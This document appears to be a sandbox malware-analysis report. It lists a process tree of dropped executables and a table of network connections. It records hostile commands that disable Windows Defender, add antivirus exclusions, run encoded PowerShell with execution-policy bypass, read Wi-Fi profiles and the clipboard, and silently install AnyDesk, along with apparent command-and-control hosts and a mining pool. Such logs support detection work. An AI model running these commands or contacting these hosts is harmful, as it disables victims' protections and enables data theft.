C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3Y06E.exe
C:\Users\Admin\AppData\Local\Temp\a\Itaxyhi.exe
"C:\Users\Admin\AppData\Local\Temp\a\Itaxyhi.exe"
C:\Users\Admin\AppData\Local\Temp\a\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\a\XClient.exe"
C:\Users\Admin\AppData\Local\Temp\a\laz.exe
"C:\Users\Admin\AppData\Local\Temp\a\laz.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1336.tmp\1337.tmp\1338.bat C:\Users\Admin\AppData\Local\Temp\a\laz.exe"
C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe
"C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe"
C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe
"C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe" --local-service
C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe
"C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe" --local-control
C:\Users\Admin\AppData\Local\Temp\a\svchosts.exe
"C:\Users\Admin\AppData\Local\Temp\a\svchosts.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 2972 -ip 2972
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2972 -s 1268
C:\Users\Admin\AppData\Local\Temp\a\any_dsk.exe
"C:\Users\Admin\AppData\Local\Temp\a\any_dsk.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\64F0.tmp\64F1.tmp\64F2.bat C:\Users\Admin\AppData\Local\Temp\a\any_dsk.exe"
C:\Users\Admin\AppData\Roaming\AnyDesk.exe
C:\Users\Admin\AppData\Roaming\anydesk.exe --install "C:\Program Files (x86)\AnyDesk" --start-with-win --silent
C:\Users\Admin\AppData\Local\Temp\a\dismhost.exe
"C:\Users\Admin\AppData\Local\Temp\a\dismhost.exe"
C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe"
C:\Users\Admin\AppData\Local\Temp\a\5dismhost.exe
"C:\Users\Admin\AppData\Local\Temp\a\5dismhost.exe"
C:\Program Files (x86)\AnyDesk\AnyDesk.exe
"C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --service
C:\Users\Admin\AppData\Local\Temp\a\4dismhost.exe
"C:\Users\Admin\AppData\Local\Temp\a\4dismhost.exe"
C:\Users\Admin\AppData\Local\Temp\a\6dismhost.exe
"C:\Users\Admin\AppData\Local\Temp\a\6dismhost.exe"
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Roaming\System32\xda.dll
C:\Users\Admin\AppData\Roaming\System32\xda.dll
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3184 -ip 3184
C:\Users\Admin\AppData\Local\Temp\a\2dismhost.exe
"C:\Users\Admin\AppData\Local\Temp\a\2dismhost.exe"
C:\Users\Admin\AppData\Local\Temp\a\3dismhost.exe
"C:\Users\Admin\AppData\Local\Temp\a\3dismhost.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3184 -s 404
C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe" /RunAsService
C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe
"C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe"
C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe
"C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe"
C:\Users\Admin\AppData\Local\Temp\a\Complexo%20v4.exe
"C:\Users\Admin\AppData\Local\Temp\a\Complexo%20v4.exe"
C:\Users\Admin\AppData\Local\Temp\a\srtware.exe
"C:\Users\Admin\AppData\Local\Temp\a\srtware.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3184 -ip 3184
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3184 -s 412
C:\Program Files (x86)\AnyDesk\AnyDesk.exe
"C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --control
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe'"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 6780 -ip 6780
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "start bound.exe"
C:\Users\Admin\AppData\Local\Temp\a\AutoHotkeyU64.exe
"C:\Users\Admin\AppData\Local\Temp\a\AutoHotkeyU64.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 84
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"
C:\Users\Admin\AppData\Local\Temp\a\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\a\Setup.exe"
C:\Users\Admin\AppData\Local\Temp\a\APQSKVTvd60SdAM.exe
"C:\Users\Admin\AppData\Local\Temp\a\APQSKVTvd60SdAM.exe"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Users\Admin\AppData\Local\Temp\bound.exe
bound.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo L0ckB1tter3 "
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Local\Temp\a\HKP098767890HJ.exe
"C:\Users\Admin\AppData\Local\Temp\a\HKP098767890HJ.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
\??\c:\Program Files (x86)\AnyDesk\AnyDesk.exe
"c:\Program Files (x86)\AnyDesk\anydesk.exe" --set-password
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Users\Admin\AppData\Local\complacence\outvaunts.exe
"C:\Users\Admin\AppData\Local\Temp\a\HKP098767890HJ.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe'
C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe" /RunAsService
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe" /RunAsService
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3cpcjorb\3cpcjorb.cmdline"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES198B.tmp" "c:\Users\Admin\AppData\Local\Temp\3cpcjorb\CSCBCEC958DCFB740CF86BBF5429A6D15CB.TMP"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 5300 -ip 5300
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 7428 -ip 7428
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5300 -s 1288
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\a\APQSKVTvd60SdAM.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\GJgncWe.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GJgncWe" /XML "C:\Users\Admin\AppData\Local\Temp\tmp21E7.tmp"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Users\Admin\AppData\Local\Temp\a\APQSKVTvd60SdAM.exe
"C:\Users\Admin\AppData\Local\Temp\a\APQSKVTvd60SdAM.exe"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe" /RunAsService
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.66.49:443 | urlhaus.abuse.ch | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| US | 8.8.8.8:53 | 49.66.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.244.41.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| US | 8.8.8.8:53 | gateway.discord.gg | udp |
| US | 162.159.134.234:443 | gateway.discord.gg | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.134.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | geolocation-db.com | udp |
| DE | 159.89.102.253:443 | geolocation-db.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 232.136.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 253.102.89.159.in-addr.arpa | udp |
| FR | 194.59.30.220:1336 | | tcp |
| US | 8.8.8.8:53 | 220.30.59.194.in-addr.arpa | udp |
| RU | 31.41.244.10:80 | 31.41.244.10 | tcp |
| US | 8.8.8.8:53 | 10.244.41.31.in-addr.arpa | udp |
| RU | 31.41.244.12:80 | 31.41.244.12 | tcp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.244.41.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| FR | 142.250.75.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| FR | 142.250.179.67:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| FR | 142.250.179.67:80 | o.pki.goog | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| FR | 142.250.74.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.75.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.74.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| GB | 2.18.190.73:80 | r11.o.lencr.org | tcp |
| US | 8.8.8.8:53 | 81.59.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 96.33.115.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.249.124.192.in-addr.arpa | udp |
| RU | 31.41.244.9:80 | 31.41.244.9 | tcp |
| US | 8.8.8.8:53 | 9.244.41.31.in-addr.arpa | udp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 8.8.8.8:53 | 16.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | 99.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | grahm.xyz | udp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | 31.10.203.116.in-addr.arpa | udp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | fightlsoser.click | udp |
| US | 104.21.35.43:443 | fightlsoser.click | tcp |
| US | 8.8.8.8:53 | e5.o.lencr.org | udp |
| GB | 2.18.190.73:80 | e5.o.lencr.org | tcp |
| US | 8.8.8.8:53 | se-blurry.biz | udp |
| US | 8.8.8.8:53 | zinc-sneark.biz | udp |
| US | 8.8.8.8:53 | dwell-exclaim.biz | udp |
| US | 8.8.8.8:53 | formy-spill.biz | udp |
| US | 8.8.8.8:53 | covery-mover.biz | udp |
| US | 172.67.206.64:443 | covery-mover.biz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | 43.35.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.206.67.172.in-addr.arpa | udp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | dare-curbys.biz | udp |
| US | 8.8.8.8:53 | print-vexer.biz | udp |
| US | 8.8.8.8:53 | impend-differ.biz | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 23.214.143.155:443 | steamcommunity.com | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | 155.143.214.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | infect-crackle.cyou | udp |
| US | 172.67.216.167:443 | infect-crackle.cyou | tcp |
| US | 8.8.8.8:53 | peerhost59mj7i6macla65r.com | udp |
| NL | 94.154.172.218:443 | peerhost59mj7i6macla65r.com | tcp |
| US | 8.8.8.8:53 | 167.216.67.172.in-addr.arpa | udp |
| US | 172.67.206.64:443 | covery-mover.biz | tcp |
| NL | 94.154.172.218:443 | peerhost59mj7i6macla65r.com | tcp |
| GB | 23.214.143.155:443 | steamcommunity.com | tcp |
| NL | 94.154.172.218:443 | peerhost59mj7i6macla65r.com | tcp |
| US | 66.45.226.53:7777 | 66.45.226.53 | tcp |
| US | 8.8.8.8:53 | 218.172.154.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.226.45.66.in-addr.arpa | udp |
| RU | 89.169.16.117:8000 | | tcp |
| RU | 178.215.118.86:2000 | | tcp |
| RU | 89.169.1.55:5000 | | tcp |
| RU | 89.169.41.167:49152 | | tcp |
| RU | 89.169.16.117:554 | | tcp |
| RU | 89.169.41.157:902 | | tcp |
| RU | 178.215.74.228:8011 | | tcp |
| RU | 89.169.41.142:2000 | | tcp |
| US | 8.8.8.8:53 | ikswccmqsqeswegi.xyz | udp |
| RU | 83.217.192.193:22 | | tcp |
| NL | 94.154.172.218:443 | peerhost59mj7i6macla65r.com | tcp |
| US | 8.8.8.8:53 | aukuqiksseyscgie.xyz | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 8.8.8.8:53 | 228.74.215.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.192.217.83.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 124.191.200.185.in-addr.arpa | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | ikswccmqsqeswegi.xyz | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| FR | 142.250.75.238:443 | drive.google.com | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| FR | 142.250.74.225:443 | drive.usercontent.google.com | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| N/A | 127.0.0.1:8080 | | tcp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| US | 8.8.8.8:53 | drive-connect.cyou | udp |
| US | 104.21.79.7:443 | drive-connect.cyou | tcp |
| US | 8.8.8.8:53 | se-blurry.biz | udp |
| US | 8.8.8.8:53 | zinc-sneark.biz | udp |
| US | 8.8.8.8:53 | dwell-exclaim.biz | udp |
| US | 8.8.8.8:53 | formy-spill.biz | udp |
| DE | 101.99.92.189:8080 | | tcp |
| US | 172.67.206.64:443 | covery-mover.biz | tcp |
| US | 8.8.8.8:53 | 7.79.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dare-curbys.biz | udp |
| US | 8.8.8.8:53 | print-vexer.biz | udp |
| US | 8.8.8.8:53 | impend-differ.biz | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.123.95.227:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | 189.92.99.101.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.95.123.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sanboxland.pro | udp |
| GB | 89.35.131.209:80 | sanboxland.pro | tcp |
| US | 8.8.8.8:53 | 209.131.35.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | a1060630.xsph.ru | udp |
| RU | 141.8.192.138:80 | a1060630.xsph.ru | tcp |
| US | 8.8.8.8:53 | 138.192.8.141.in-addr.arpa | udp |
| FR | 142.250.75.238:443 | drive.google.com | tcp |
| FR | 142.250.74.225:443 | drive.usercontent.google.com | tcp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | f0706909.xsph.ru | udp |
| RU | 141.8.193.236:80 | f0706909.xsph.ru | tcp |
| US | 8.8.8.8:53 | ipwho.is | udp |
| DE | 195.201.57.90:80 | ipwho.is | tcp |
| US | 8.8.8.8:53 | 236.193.8.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.57.201.195.in-addr.arpa | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| N/A | 127.0.0.1:50754 | | tcp |
| N/A | 127.0.0.1:50936 | | tcp |
| DE | 84.118.224.155:9001 | | tcp |
| LT | 213.252.245.153:8080 | | tcp |
| US | 8.8.8.8:53 | 153.245.252.213.in-addr.arpa | udp |
| DE | 188.68.50.76:9001 | | tcp |
| FI | 95.217.112.243:443 | | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 8.8.8.8:53 | 76.50.68.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 243.112.217.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xmr-eu2.nanopool.org | udp |
| GB | 51.195.138.197:10343 | xmr-eu2.nanopool.org | tcp |
| US | 8.8.8.8:53 | 197.138.195.51.in-addr.arpa | udp |
| DE | 195.201.57.90:80 | ipwho.is | tcp |
| US | 8.8.8.8:53 | a1059592.xsph.ru | udp |
| RU | 141.8.192.138:80 | a1059592.xsph.ru | tcp |
| US | 8.8.8.8:53 | f1043947.xsph.ru | udp |
| RU | 141.8.192.151:80 | f1043947.xsph.ru | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 151.192.8.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | freegeoip.app | udp |
| US | 104.21.73.97:443 | freegeoip.app | tcp |
| US | 8.8.8.8:53 | a1051707.xsph.ru | udp |
| RU | 141.8.192.217:80 | a1051707.xsph.ru | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| US | 8.8.8.8:53 | ipbase.com | udp |
| FR | 142.250.75.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:80 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 97.73.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.192.8.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.75.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 172.67.209.71:443 | ipbase.com | tcp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 154.216.17.90:80 | | tcp |
| RU | 176.113.115.19:80 | 176.113.115.19 | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | www.speak-a-message.com | udp |
| DE | 195.201.119.163:80 | www.speak-a-message.com | tcp |
| US | 8.8.8.8:53 | 19.115.113.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.119.201.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | awake-weaves.cyou | udp |
| US | 172.67.143.116:443 | awake-weaves.cyou | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | immureprech.biz | udp |
| US | 172.67.207.38:443 | immureprech.biz | tcp |
| US | 8.8.8.8:53 | 116.143.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 38.207.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | deafeninggeh.biz | udp |
| US | 104.21.32.1:443 | deafeninggeh.biz | tcp |
| US | 8.8.8.8:53 | effecterectz.xyz | udp |
| US | 8.8.8.8:53 | diffuculttan.xyz | udp |
| US | 8.8.8.8:53 | debonairnukk.xyz | udp |
| US | 8.8.8.8:53 | wrathful-jammy.cyou | udp |
| US | 104.21.74.196:443 | wrathful-jammy.cyou | tcp |
| US | 8.8.8.8:53 | jrqh-hk.com | udp |
| US | 8.8.8.8:53 | id71.internetid.ru | udp |
| US | 8.8.8.8:53 | 1.32.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.74.21.104.in-addr.arpa | udp |
| CN | 123.136.92.99:80 | jrqh-hk.com | tcp |
| RU | 95.213.205.83:5655 | id71.internetid.ru | tcp |
| US | 8.8.8.8:53 | sordid-snaked.cyou | udp |
| US | 104.21.27.63:443 | sordid-snaked.cyou | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| US | 8.8.8.8:53 | 83.205.213.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.92.136.123.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 63.27.21.104.in-addr.arpa | udp |
| GB | 104.124.170.33:443 | steamcommunity.com | tcp |
| RU | 109.234.156.179:5655 | | tcp |
| US | 8.8.8.8:53 | 179.156.234.109.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.170.124.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | login-donor.gl.at.ply.gg | udp |
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
